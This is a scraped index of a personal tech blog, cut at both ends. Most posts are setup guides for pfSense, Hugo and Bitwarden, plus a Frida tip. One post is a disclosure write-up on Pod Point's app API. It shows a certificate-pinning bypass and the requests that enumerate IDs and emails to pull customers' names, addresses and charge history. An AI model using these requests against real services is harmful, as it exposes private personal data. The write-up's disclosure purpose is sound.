Turkey, which was the same country where my partner\u0026rsquo;s dad had his car serviced.\nSummary It was very interesting to dive into how VIN numbers are made-up, and what information they contain. In addition, the Microcat software is a powerful tool not only for professional mechanics but also for reverse engineering certain car parts.\nResources Hyundai VIN Format Word Manufacturer Identities (WMI) Reverse engineering Microcat US Database ","permalink":"https://markuta.com/vin-number-haystack/","title":"Reverse VIN lookup by part numbers"},{"categories":null,"contents":"This post will describe how I discovered a security flaw in Pod Point\u0026rsquo;s mobile app API endpoints. It covers bypassing certificate pinning with Frida, and demonstrate how attackers can steal full names, addresses, charging history, and more by simply having a registered account that anyone can obtain.\nPod Point Pod Point is a UK based company established in 2009 that provides electric vehicle charging equipment to both businesses and individuals. It also operates what’s called the “Pod Point Network” where customers can use charge points across the country with a mobile app.\nInitial Discovery In March 2021, I researched EV charging providers. Most offered similar services and products. But since I didn\u0026rsquo;t want to spend any money buying physical hardware, I opted to check out their mobile apps instead.\nAfter registering a test account, I then started to look for any interesting features. I quickly noticed that the My Account menu had an option called \u0026ldquo;Add Home Charger, \u0026quot; allowing users to add Pod Point devices to their account by providing a unique device serial number.\nA quick Google image search revealed that serial numbers prefixed with \u0026ldquo;PSL\u0026rdquo; require a 6-digit number. As a quick sanity check, I entered a random number of \u0026ldquo;111111\u0026rdquo; to see if any devices existed.\nFigure-1: Android mobile app Pod Point \u0026ldquo;Add Home Charger\u0026rdquo; menu.\nAbove is a screenshot of the \u0026ldquo;Add Home Charger\u0026rdquo; menu with a randomly chosen device serial. After tapping \u0026ldquo;Add my home charger\u0026rdquo;, a confirmation message with a partial email address of the primary account holder is shown.\nA device with the serial number \u0026ldquo;PSL-111111\u0026rdquo; already exists and belongs to an account. To add this device requires additional permission from the primary account holder in the form of an email confirmation link. It was pretty interesting seeing a partial email address.\nDiving Deeper To continue our research we needed to see how the app communicates with the backend services. To do this we set up a Burp Suite, a proxy listener was configured on a testing machine, and then we updated the test mobile device’s network settings.\nI immediately hit a slight road block because the mobile app utilities Certificate Pinning.\nFigure-2: Burp Suite certificate error.\nBypassing certificate pinning Certificate pinning is a method used by app developers to restrict certificate usage. A Certificate Authority (CA) is usually ‘pinned’ to the app itself, and all other certificates are rejected, including root certificates trusted by the system.\nTo bypass this security measure, I opted for using the excellent instrumentation toolkit called Frida. Frida can attach to a process (app) and change the return values of functions. For example, it can inject into a function call that checks a certificate’s common name. I used a hook written by Tim Perry.\nA quick overview of steps:\nConnect to a rooted device using adb Start a Frida server as root Locate the Pod Point app package name (com.podpoint) Launch the Pod Point app with Frida and a Hook.js Here is the app using Frida with a specific ceritificate pinning bypass hook:\nfrida -U -l hook.js -f com.podpoint --no-pause [Pixel 3a::podpoint]-\u0026gt; [+] Bypassing OkHTTPv3 {1}: api.pod-point.com Frida detected and hooked into an OkHTTPv3 function that checks for a certificate with the common name (api.pod-point.com). It changed the return value to null or false. When going back to Burp Suite, the sitemap in the target menu now shows the website paths, meaning Frida bypassed certificate pinning.\nFigure-3: A list of paths of api.pod-point.com in burp suite site map.\nIdentifying API endpoints The app talks to a server called api.pod-point.com. Multiple API endpoints relate to individual actions requested by the app. But not all APIs leak customer information. Some provide standard functionality required for users to log in and manage their accounts.\n/v4/addresses – public available charge addresses /v4/units – customer data and devices /v4/users/\u0026lt;USER_ID\u0026gt;/charges - customer full charge history /v4/pods – data on pod devices /v4/auth – logged-in user information /v4/sessions – authentication (email and password) /v4/password_reset – reset account passwords I\u0026rsquo;ll only be focusing on the first three API endpoints, which leak sensitive customer data or can be abused. The following few sections go into more details of how and what data is actually leaked.\nGetting customer data When adding a Home Charger to your account. A HTTP GET request /v4/units?ppid={DEVICE_SERIAL} is sent to the server address api.pod-point.com. The request header includes an authorisation bearer token which is the user authentication. Any logged-in user can obtain this token.\nFigure-4: A request showing sensitive information of a customer being exposed.\nYou can see on the right side of the screenshot the server responds with a JSON object. This object contains a nested object called “installation”, which shows customer information and details about the device and its installation.\nA list of customer’s data is revealed:\nCustomer’s unique user identification Customer’s full name Customer’s full address Customer’s partial email address We have also seen other information on Pod Point devices including, the device last contact date, contactless status and unique device identifier. Attackers can use this to gather intelligence to know whether a customer’s vehicle is charging.\nAdditionally, querying the endpoints with empty values returns a paginated data stream of (5652 pages with 25 records per page), indicating over 141,289 private customer records exposed on the Internet.\nGetting customer data via email address Not only is it possible to retrieve sensitive customer data by enumerating serial number but also using the primary account holder’s email address. The API endpoint /v4/units allows users to query other customers’ data by using a parameter called customer_email.\nHere is an example of a HTTP GET request retrieving data using a specific email address:\nGET /v4/units?customer_email=some_user@example.com HTTP/1.1 user-agent: POD Point Native Mobile App [...] Authorisation: Bearer Token [...] Host: api.pod-point.com This is quite scary because if somebody knows your email address and knows that you use a Pod Point device. They can work out your full address by sending a simple HTTP request to the backend API endpoint.\nGetting customer charge history Using a customer’s ID it is possible to retrieve the entire charge history from the day they created their account. Just like with serial numbers the customer ID can be enumerated in the same way.\nThis API endpoint /v4/users/{USER_ID}/charges is responsible for retrieving charge history of customers. The server responds with a JSON object that shows information such as (start and end times, duration, costs, locations, kW usage) and more.\nHere is an an example of a HTTP GET request to retrieve a user’s charge data:\nGET /v4/users/{USER_ID}/charges HTTP/1.1 user-agent: POD Point Native Mobile App [...] Authorisation: Bearer Token [...] Host: api.pod-point.com And the response we get back a JSON object with charge information:\n{ \u0026#34;charges\u0026#34;: [ { \u0026#34;id\u0026#34;: 17537077, \u0026#34;kwh_used\u0026#34;: 0.3, \u0026#34;duration\u0026#34;: 25, \u0026#34;starts_at\u0026#34;: \u0026#34;2021-05-30T06:13:10+00:00\u0026#34;, \u0026#34;ends_at\u0026#34;: \u0026#34;2021-05-30T06:38:37+00:00\u0026#34;, \u0026#34;billing_event\u0026#34;: { \u0026#34;id\u0026#34;: 2954682, \u0026#34;amount\u0026#34;: 0, \u0026#34;currency\u0026#34;: \u0026#34;GBP\u0026#34;, \u0026#34;exchange_rate\u0026#34;: 1, \u0026#34;presentment_currency\u0026#34;: \u0026#34;GBP\u0026#34; }, \u0026#34;location\u0026#34;: { \u0026#34;id\u0026#34;: 4522, \u0026#34;home\u0026#34;: false, \u0026#34;address\u0026#34;: { \u0026#34;id\u0026#34;: 1301, \u0026#34;business_name\u0026#34;: \u0026#34;Tesco Extra - Llansamlet\u0026#34; } }, \u0026#34;pod\u0026#34;: { \u0026#34;id\u0026#34;: 58782 }, \u0026#34;energy_cost\u0026#34;: 4 }, ... The API endpoint /v4/users/{USER_ID}/favourites does exist, which shows favourite charge locations, but access is restricted. However, attackers can still work out favourite locations by cross-referencing the location ID with the API in the next section.\nGetting public charge locations This particular API doesn’t expose any personally identifiable information since it’s used in helping users find local charge points. However, it can be abused by combining the previous example, which could allow attackers a way to figure out charge locations and predict their next location.\nThis API endpoint /v4/addresses returns a massive collection of Pod Point device addresses. Each page has metadata that shows there are approximately 15,000 devices. Unlike other API endpoints, I was not able to find usable search parameters apart from the page number.\nAn example of a HTTP GET request sent to /v4/addresses?page=218:\nAnd the response shows an address which belongs to a police station in Wiltshire, GB.\n{ \u0026#34;addresses\u0026#34;: [ { \u0026#34;id\u0026#34;: 58036, \u0026#34;name\u0026#34;: \u0026#34;HQ-Front FM hangar (left)\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;pod_count\u0026#34;: 1, \u0026#34;type\u0026#34;: \u0026#34;Government\u0026#34;, \u0026#34;roadside\u0026#34;: false, \u0026#34;restrictions\u0026#34;: true, \u0026#34;email\u0026#34;: \u0026#34;XXXXXXXX@wiltshire.pnn.police.uk\u0026#34;, \u0026#34;location\u0026#34;: { \u0026#34;lat\u0026#34;: 51.3562169, \u0026#34;lng\u0026#34;: -1.9841969, \u0026#34;evZone\u0026#34;: false }, \u0026#34;address\u0026#34;: { \u0026#34;business_name\u0026#34;: \u0026#34;HQ-Front FM hangar (left)\u0026#34;, \u0026#34;address1\u0026#34;: \u0026#34;London Road\u0026#34;, \u0026#34;address2\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;town\u0026#34;: \u0026#34;Wiltshire\u0026#34;, \u0026#34;postcode\u0026#34;: \u0026#34;SN10 2DN\u0026#34;, \u0026#34;country\u0026#34;: \u0026#34;GB\u0026#34; }, ... Summary The analysis has shown the Pod Point mobile app has several API endpoints which expose customer data. All that attackers need is to have a registered account. In addition, there is no limit to the number of requests a user can make, which makes it possible for an account and device enumeration. As long as the authorisation bearer token is valid, attackers can enumerate device serial numbers and harvest customer data.\nDisclosure timeline 15-Mar-2021 – Initial discovery 30-Jun-2021 – The first email sent to Pod Point support (no response) 10-Aug-2021 – A second follow-up email sent to Pod Point support (no response) 02-Sep-2021 – A third email sent to Pod Point app feedback (no response) 21-Sep-2021 – A fourth email sent to Pod Point support (no response) 28-Sep-2021 – Contacted Which? to help with the disclosure 30-Sep-2021 – Pod Point fixes the issue ","permalink":"https://markuta.com/pod-point-exposes-customer-data/","title":"Pod Point exposes customer data"},{"categories":null,"contents":"I recently decided to improve my home network by purchasing a pfSense box. I wanted to ditch my ISP issued router, a Tilgin HG2381 router which works well for simple networks but fails to offer advanced configuration options, like support for wireguard VPN or VLANs.\nHyperOptic HyperOptic is a UK broadband provider which supports both IPv4 and IPv6 address assignment. For IPv4 addresses they use Carrier-grade NAT (CGN) which doesn\u0026rsquo;t allow exposing a service using port forwarding.\nA static IPv4 option is available which costs an extra £5 per month. But I decided to use IPv6 for all my services instead. This was a nightmare at first, I could not get my new pfSense working correctly with IPv6.\nOn their website they provide a seemingly useful guide on configuring IPv6 with a third-party router. Link: https://www.hyperoptic.com/faq/posts/static-ip-addresses/\nHowever, these instructions did NOT work for me.\npfSense I\u0026rsquo;m using a Netgate SG-1100 as my main firewall and router, but these configuration options should still work on any hardware supported by pfSense software. Before changing anything, now is a good idea to backup your current configuration.\nWAN settings Navigate to Interfaces and select the WAN interface. Change IPv6 Configuration Type to DHCP6 and scroll down until you see the DHCP6 Client Configuration section, supply the following options:\nRequest only an IPv6 prefix DHCPv6 Prefix Delegation size (56) Send IPv6 prefix hint Debug Do not wait for a RA Do not allow PD/Address release Leave the rest of the options unchecked.\nIn my case I needed to do an extra step which was to spoof the MAC address of the WAN interface to match my ISP supplied device. To change the Mac address, go to System \u0026gt; Setup Wizard and click through until you get to (step 4), copy the MAC address from your ISP issued device.\nWithout this step my pfSense device would fail to assign an IPv6 address.\nLAN or vLAN settings For your LAN or VLAN(s) settings, select your Interface and set the IPv6 Configuration Type to Track Interface. And in the Track IPv6 Interface specify:\nIPv6 Interface WAN IPv6 Prefix ID 0 I have several VLANs on my network so I need to set a different Prefix ID for each interface. To keep things organsied I set the Prefix ID value to match the VLAN TAG or network subnet e.g.\nVLAN10 Prefix ID - 10 IPv4 addresses - 10.1.10.XX IPv6 addresses – 2a01:4b00:XXXX:XX10:XXXX:XXXX:XXXX:XXXX VLAN20 Prefix ID - 20 IPv4 addresses - 10.1.20.XX IPv6 addresses – 2a01:4b00:XXXX:XX20:XXXX:XXXX:XXXX:XXXX This way I can immediately identify which VLAN an IPv6 address is from.\nDHCPv6 settings Finally, go to Services \u0026gt; DHCPv6 Server \u0026amp; RA. Next, select the interface you want to configure (e.g. LAN).\nEach interface has two types of settings, DHCPv6 server and Router Advertisements.\nFor the DHCPv6 server, I completely disable it and click Save.\nFor Router Advertisements I set the options:\nRouter mode Assisted Router priority Normal Leave the rest as default and click Save.\nIssues and Solutions We have a better view of what\u0026rsquo;s happening using the debug mode for the DHCPv6 client. The DHCP log file is located at /var/log/dhcp.log and showed the following:\nMay 1 10:28:43 dhcp6c 75307 send solicit to ff02::1:2%em1 May 1 10:28:43 dhcp6c 75307 reset a timer on em1, state=SOLICIT, timeo=5, retrans=31928 May 1 10:29:15 dhcp6c 75307 Sending Solicit May 1 10:29:15 dhcp6c 75307 set client ID (len 14) May 1 10:29:15 dhcp6c 75307 set elapsed time (len 2) May 1 10:29:15 dhcp6c 75307 set option request (len 4) May 1 10:29:15 dhcp6c 75307 set IA_PD prefix May 1 10:29:15 dhcp6c 75307 set IA_PD A Netgate forum member experienced the exact same errors. The post IPv6 LAN with Tracking interface problem explains that they couldn\u0026rsquo;t get IPv6 address on their LAN network.\nThis issue was likely caused by HyperOptic because they do not respond to RA requests coming from devices that are not issued by them. Spoofing the MAC address solved this.\n","permalink":"https://markuta.com/pfsense-ipv6-hyperoptic/","title":"pfSense and IPv6 on HyperOptic"},{"categories":null,"contents":"UPDATE (20-Mar-2022): MagiskHide has been dropped from Magisk 24.3. Checkout my blog post on comparing root detection for 24 banking apps where I also use Frida to spawn apps.\nFor mobile app analysis, using a rooted device with Magisk and Frida has become my bread and butter. I\u0026rsquo;m aware that emulators exist (which I also use) but solutions, such as Android Studio or Genymotion fail to offer the same level of performance as a physical device. I use a second-hand Google Pixel 3a bought on Amazon for most of my testing.\nMagisk Magisk is a suite of open source software for customizing Android devices. It provides users the ability to execute system commands on production devices and even extend features through modules. Magisk also provides a neat feature called MagiskHide, which hides certain root artifacts from detection methods used by apps.\nFrida Frida is a dynamic code instrumentation toolkit that allows you inject JavaScript code into native apps on Windows, macOS, GNU/Linux, iOS and Android. I use Frida mostly for bypassing Certificate Pinning and hooking into interesting functions - read my post on how I discovered a EV provider leaking 140k customers\u0026rsquo; data.\nMagiskHide and Frida works together fine if you only want to attach to an already running process. There are three ways (I am not covering patched APKs):\nAttach by the process ID e.g. frida -U -l hook.js -p \u0026lt;PID\u0026gt; Attach by the process name e.g. frida -U -l hook.js -n 'app name' Attach by unique app name e.g. frida -U -l hook.js com.example.app Problem When MagiskHide is enabled, it is not possible to spawn or launch a process using Frida (with the -f option). You will get the following error when you try to run frida -U -l hook.js -f com.example.app --no-pause:\nFailed to spawn: unable to access zygote while preparing for app launch; try disabling Magisk Hide in case it is active Why? The short answer is both Frida and Magisk require Zygote module to spawn processes.\nFor people wondering why this is needed, Magisk Hide ptraces the zygote module in order to intercept calls, which locks out other apps from doing so, and zygote is needed by Frida to spawn apps and do early hooking. – gmlime on Stackoverflow\nSolution(s) More of workarounds.\nDisable MagiskHide The obvious one is to temporarily disable MagiskHide. You can quickly disable it through the command-line using adb. Run adb shell \u0026quot;su -c magiskhide disable\u0026quot; (note: using su -c because adb shell root does not work on production builds).\nRun a Script Another way is to create a script to automatically start an app using built-in Android utilities, then quickly attach to that process with Frida. This method is not fool proof but does provide decent results. You can use utilities like adb shell am start or adb shell monkey to spawn a process.\nI personally like to use the latter because you don\u0026rsquo;t need to specify an Activity Name, only the app itself. Below is a simple script I wrote which spawns an app using monkey, gets the PID of the process, and then finally attaches to it using the local Frida client:\n#!/bin/bash run_proc=$(adb shell monkey -p $1 1) get_pid=$(adb shell ps | grep -i $1 | awk \u0026#39;{printf $2}\u0026#39;) if [[ -z \u0026#34;$get_pid\u0026#34; ]]; then echo \u0026#34;Didn\u0026#39;t find PID :(\u0026#34; else echo \u0026#34;Attaching to process..\u0026#34; frida -U -l $2 -p $get_pid fi Here is an example of the script launching Adidas\u0026rsquo;s Confirmed app:\nTo use this script you need the following:\nA Frida-server running on the mobile device A Frida client on your local machine A device connected via USB A hook.js file to load Resources There were a few users on Github also experiencing the same issue here and here. Somebody suggest to temporarily disable MagiskHide, spawn an app using Frida and re-enable it again. However, this didn\u0026rsquo;t work for me and caused my device to crash and reboot.\n","permalink":"https://markuta.com/frida-and-magisk-hide/","title":"Frida and MagiskHide"},{"categories":null,"contents":"Update (25/11/21) added a section on Page Rules.\nFor markuta.com I now use Hugo with a theme called PaperMod. Github is still used storage on a private repository (Github pages doesn\u0026rsquo;t allow private repos for free accounts). And Cloudflare Pages is linked to Github to deploy the website.\nRequirements To get started you need the following:\nHugo and Git software Github account (free) Cloudflare account (free) Domain name (not required but nice to have) Install Software You need to make sure Hugo and Git are installed. For Linux: sudo apt install hugo. For macOS via brew: brew install hugo. And for Windows I\u0026rsquo;d recommend using WSL.\nGithub Create a Repository Go ahead and log-in into Github and create a new (public or private) repository, then do a git clone to your local device.\nLink access with Cloudflare You can link your Cloudflare now or later.\nHugo Create a new Hugo site Next, navigate to the cloned repo folder on your local machine and type the following Hugo command to create a new site file structure. The --force flag will write to that the directory even if it already exists, otherwise it\u0026rsquo;ll complain.\ncd ~/my-blog hugo new site . --force You can also do the previous steps in reverse, make a new hugo site and create a repo.\nChoose a Hugo theme It\u0026rsquo;s a good time to choose a Hugo theme. Check out: https://themes.gohugo.io/ for a big list.\nMost themes are available on Github and can be installed via submodules. For example to install my current theme (PaperMod) go to the root folder of your repository and run the following:\ngit submodule add https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod git submodule update --init --recursive Edit Hugo config It is important to note that each theme may have its own configuration file which you need to use. In the case of PaperMod theme a sample is provided: config.yml.\nA convert toml based config file (snippet) will look something like this:\nbaseURL = \u0026#34;https://markuta.com/\u0026#34; title = \u0026#34;Markuta\u0026#34; paginate = 5 theme = \u0026#34;PaperMod\u0026#34; enableRobotsTXT = true buildDrafts = false buildFuture = false buildExpired = false googleAnalytics = \u0026#34;UA-XXXXXX\u0026#34; [minify] disableXML = true minifyOutput = false # Cloudflare Pages has issues when true [params] env = \u0026#34;production\u0026#34; ... Run Hugo site locally To run the Hugo site locally first navigate to the root of your repository and type:\nhugo server -D A local web server will start listening on http://localhost:1313 and have output similar to:\nhugo server -D Start building sites … hugo v0.87.0+extended darwin/amd64 BuildDate=unknown | EN -------------------+------ Pages | 132 Paginator pages | 6 Non-page files | 44 Static files | 12 Processed images | 0 Aliases | 53 Sitemaps | 1 Cleaned | 0 Built in 130 ms To stop the web server type ctrl+c.\nCloudflare Create a project Go and log-in into Cloudflare and select Pages then click on create a new project. You will be asked to link your Github account and asked to select a repository. I tend to only allow Cloudflare permission to a selected few rather than all of the repositories.\nClick \u0026ldquo;Begin setup\u0026rdquo; to continue.\nSet up builds and deployments Choose a project name which can only contain lowercase letters (a-z), numbers (0-9), dashes. I use Github\u0026rsquo;s default main as the production branch.\nNext configure the Build settings options:\nFor Framework present set: Hugo For Build command choose hugo (will be automatically set) Build output directory choose public (will be automatically set) Skip Root directory Environment variables Add new variable name HUGO_VERSION with 0.87.0 Finally click Save and Deploy.\nIf everything went fine your site should be deployed and accessible via \u0026lt;project-name\u0026gt;.pages.dev. You can stop here or continue to set up your own domain.\nAdd custom domains From the previous section hit continue to project or just navigate to your project from the Pages menu. Under your project is a Custom domains tab and below that is a Set up a custom domain button. Click it and you will be then asked to give a domain name e.g. markuta.com\nSince I already use Cloudflare for DNS management it automatically edited settings for me. A CNAME will be set for www.example.com and domain name flattening applied to example.com because CNAME records are not allowed on root/apex domains.\nPage Rules To get to the Page Rules menu, head over to your main home and select your domain name. Next, go to Rules and select Create page rule.\nI personally only use two rules that are applied on the markuta.com domain. The first rule redirects any HTTP request to HTTPS. The second rule redirects all requests from www.markuta.com to markuta.com.\nRule 1) Redirect www to non-www\nURL to match https://www.markuta.com/* Settings are: Forwarding URL with 301 - Permanent Redirect https://markuta.com/$ Rule 2) Redirect all HTTP to HTTPS\nURL to match: http://*markuta.com/* Settings are: Always Use HTTPS Issues and Solutions There were some issues along the way but have now been solved.\nCloudflare Pages builds For some reason Cloudflare Pages kept failing to build the Hugo website. And after hours of researching and rebuilding I found the culprit.\nExample of Cloudflare logs below:\n... 17:51:34.982\tInstalling missing commands 17:51:34.982\tVerify run directory 17:51:34.982\tExecuting user command: hugo 17:51:35.019\tStart building sites … 17:51:35.019\thugo v0.87.0-B0C541E4+extended linux/amd64 BuildDate=2021-08-03T10:57:28Z VendorInfo=gohugoio 17:51:35.226\tERROR 2021/08/28 16:51:35 JSON parse error: expected comma character or an array or object ending on line 61 and column 40 17:51:35.226\t12: { 17:51:35.226\t^ ... The issue was down to an option in the config.toml file. The theme I chose had a line minifyOutput = true which was is to do with minifying HTML/CSS elements. I just wish Cloudflare would\u0026rsquo;ve been a little more helpful with their error messages. Changing the option to false the website built successfully.\nRunning Hugo locally I tend to run a Hugo site locally before pushing to Github. After doing a git clone of the remote repo on a new device and running hugo server -D the local site failed to load properly.\nExample of Hugo logs below:\n... WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. | EN -------------------+----- Pages | 53 Paginator pages | 0 Non-page files | 43 Static files | 11 Processed images | 0 Aliases | 0 Sitemaps | 1 Cleaned | 0 Built in 67 ms ... This one was my fault. I had forgotten that the PaperMod theme is a git submodule and I didn\u0026rsquo;t give the --recurse-submodules flag when cloning the repo. If you\u0026rsquo;ve already cloned the repo you can still run it manually:\ngit submodule init git submodule update Useful Links Cloudflare\u0026rsquo;s guide on how to deploy a Hugo site ","permalink":"https://markuta.com/hugo-site-on-cloudflare-pages/","title":"Hugo Site on Cloudflare Pages"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll be covering how to install a self hosted Bitwarden server as a password management solution using Docker on a Raspberry Pi. We will get two containers running (Bitwarden server) and (Nginx reverse proxy). I\u0026rsquo;ll also go into hardening the Bitwarden configuration and applying 2FA for log-ins.\nWhat is Bitwarden? Bitwarden is an open-source password management solution. It supports almost all major systems. The version we\u0026rsquo;re going to be using is the unofficial one created by Daniel Garcia, Github page: https://github.com/dani-garcia/bitwarden_rs. This version of Bitwarden is unofficial but it\u0026rsquo;s really well made, and just works.\nRequirements Raspberry Pi (I\u0026rsquo;m using a model 3 B+) Docker software Bitwarden_rs (unofficial version) Domain name for TLS certificate Optional Zymkey 4i is a Hardware Security Module for RPi. Installation To start off with you\u0026rsquo;ll want to download and install the latest version of Raspbian on your Pi. I personally recommend Raspbian Buster Lite (now called Raspberry Pi OS Lite), since it will be running 24/7 as a server, you don\u0026rsquo;t really need a desktop environment nor the default office suite packages that are included. Make sure that the device is connected to the internet and contains the latest packages, I also like to enable SSH during the initial installation process and harden the sshd_config configuration file.\nI will cover how to install Zymbit zymkey 4i IoT security module in a future post.\nDocker We are going to be running BitWarden as a Docker container. Docker makes it an easy and simple to manage containers, which we can easily upgrade in the future. The image we are going to be use is available on https://hub.docker.com/r/bitwardenrs/server.\nDownload and install Docker software with following on the Pi:\nsudo curl -fsSL get.docker.com -o get-docker.sh \u0026amp;\u0026amp; sudo sh get-docker.sh Give the user permission to run Docker (pi is the default user):\nsudo usermod -aG docker pi Make sure Docker start on every system boot:\nsudo systemctl enable docker Restart your Raspberry Pi\nsudo reboot Once restarted, your Raspberry Pi should be ready to move onto with the configuration.\nConfiguration Now that we have all the necessary applications installed we can continue with the configuration. We will first set up a Bitwarden container, as well as the Nginx reverse proxy container. Later on we\u0026rsquo;ll configure a Dockerfile to start all containers at once, I will be using a custom docker-compose file, found here.\nA quick overview of what we\u0026rsquo;re going to do:\nPull the latest bitwarden_rs image from Docker hub First Start-up create a new account enable two-factor authentication Stop the container disable new registrations disable admin panel enable HTTPS support Start the container with the new options + nginx Pulling image from Docker Hub The Docker image we\u0026rsquo;re going to use is by https://hub.docker.com/r/bitwardenrs/server. You can find the source code on https://github.com/dani-garcia/bitwarden_rs. You also no longer need to use the tag bitwardenrs/server:raspberry for Raspberry Pi systems.\nTo pull the image with Docker:\ndocker pull bitwarden_rs/server:latest First Time Start-up After downloading the docker image you would want to choose a folder to mount a volume on the host system for persistent storage. The directory that I have chosen is located /bw-data. This is where all of our encrypted passwords will be stored, along with other web files.\nTo run the container for the first time:\ndocker run -d --restart always \\ --name bitwarden \\ -e SIGNUPS_ALLOWED=true \\ -v /bw-data/:/data/ \\ -p 60888:80 \\ bitwardenrs/server:latest Your Bitwarden web server will be accessible at: http://IP-ADDRESS\u0026gt;:60888. You can change the external port number by modifying the previous command (-p). Go ahead and register an account and log-in. To enable 2FA follow the steps below.\nGo to Settings: Select Two-step login and the type of 2FA you want to use. For example Authenticator app: Then enter your code. You can now stop the container and move on to the next stage. Locking down your Bitwarden server and including a Nginx reverse proxy server.\ndocker stop bitwarden Hardening Process In the next step we\u0026rsquo;ll be going through the process of hardening our server for actual use. We\u0026rsquo;ll be covering how to set up a Nginx reverse proxy and also install a certificate.\nTo keep things organised I\u0026rsquo;ve created a folder called bitwarden which stores all configuration files and folders, the structure looks like this:\n- bw-data/ - nginx/ - nginx.conf - ssl.conf - dhparams.pem - docker-compose.yml Dockerfile This Dockerfile was created to ease the installation process. It contains two containers with some configuration options. You will have to change these to suite your own environment. The environment variables for the Bitwarden container are for my own personal preference.\nversion: \u0026#34;3.5\u0026#34; services: nginx: restart: always image: nginx:stable-alpine container_name: nginx volumes: - ./nginx/dhparams.pem:/etc/ssl/dhparams.pem - ./nginx/ssl.conf:/etc/nginx/ssl.conf - ./nginx/nginx.conf:/etc/nginx/nginx.conf - ./nginx/cache/:/etc/nginx/cache - ./nginx/error.log:/etc/nginx/error.log - /etc/letsencrypt:/etc/letsencrypt - /etc/ssl/certs/self-signed.crt:/etc/ssl/certs/self-signed.crt - /etc/ssl/private/self-signed.key:/etc/ssl/private/self-signed.key ports: - \u0026#34;60888:60888\u0026#34; networks: - bit_net bitwarden: restart: always image: bitwardenrs/server:latest container_name: bitwarden volumes: - ./bw-data:/data environment: - TZ=Europe/London - LOG_FILE=/data/bitwarden.log - EXTENDED_LOGGING=true - LOG_LEVEL=warn - ROCKET_WORKERS=20 - WEBSOCKET_ENABLED=true - SIGNUPS_ALLOWED=false - DISABLE_ADMIN_TOKEN=true - INVITATIONS_ALLOWED=false - SHOW_PASSWORD_HINT=false - DISABLE_ICON_DOWNLOAD=false ports: - \u0026#34;80\u0026#34; - \u0026#34;3012\u0026#34; networks: - bit_net networks: bit_net: name: bit_net nginx.conf The nginx.conf file I use for the reverse proxy for Bitwarden. Within each server configuration update listen 60888 and server_name bitwarden.example.com; to suit your own preference. You can leave the rest as it is.\nhttp { error_log /etc/nginx/error.log warn; client_max_body_size 20m; server_tokens off; # Use self-signed certificate for IP addresses server { listen 60888 default_server ssl http2; server_name _; server_name_in_redirect off; return 404; # deny all requests ssl_certificate /etc/ssl/certs/self-signed.crt; ssl_certificate_key /etc/ssl/private/self-signed.key; } # The main Bitwarden web config server { listen 60888 ssl http2; server_name bitwarden.example.com; include /etc/nginx/ssl.conf; # valid certificate client_max_body_size 128M; location / { proxy_pass http://bitwarden:80; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } location /notifications/hub { proxy_pass http://bitwarden:3012; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; } location /notifications/hub/negotiate { proxy_pass http://bitwarden:80; } } } ssl.conf This file will be included by the previous nginx.conf. You need to replace the options ssl_certificate, ssl_certificate_key, and ssl_trusted_certificate to suit your own domain name.\nssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem; # Improve HTTPS performance with session resumption ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; # Enable server-side protection against BEAST attacks ssl_protocols TLSv1.2; ssl_prefer_server_ciphers on; ssl_ciphers \u0026#34;ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384\u0026#34;; # RFC-7919 recommended: https://wiki.mozilla.org/Security/Server_Side_TLS#ffdhe4096 ssl_dhparam /etc/ssl/dhparams.pem; ssl_ecdh_curve secp521r1:secp384r1; # Additional Security Headers # ref: https://developer.mozilla.org/en-US/docs/Security/HTTP_Strict_Transport_Security add_header Strict-Transport-Security \u0026#34;max-age=31536000; includeSubDomains\u0026#34;; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options add_header X-Frame-Options DENY always; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options add_header X-Content-Type-Options nosniff always; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection add_header X-XSS-Protection \u0026#34;1; mode=block\u0026#34; always; # Enable OCSP stapling # ref. http://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox ssl_stapling on; ssl_stapling_verify on; ssl_trusted_certificate /etc/letsencrypt/live/example.com/fullchain.pem; resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] valid=300s; # Cloudflare resolver_timeout 5s; dhparams.pem To generate a 4096-bit Diffie-Hellman parameter with openssl, type:\nopenssl dhparam -out dhparams.pem 4096 Certificates DO NOT USE THE DEFAULT HTTP PORT FOR YOUR PASSWORD MANAGEMENT!\nTo use the official Bitwarden app on say an iPhone with your self-hosted environment you need to use a valid TLS certificate. If you don\u0026rsquo;t the OS will throw an error and refuse the connection since the certificate isn\u0026rsquo;t valid. A workaround may be to add your self-signed certificate (not tested) to the trusted list on each device. A better approach would be to generate a valid TLS certificate.\nFor Let\u0026rsquo;s Encrypt there are two main methods 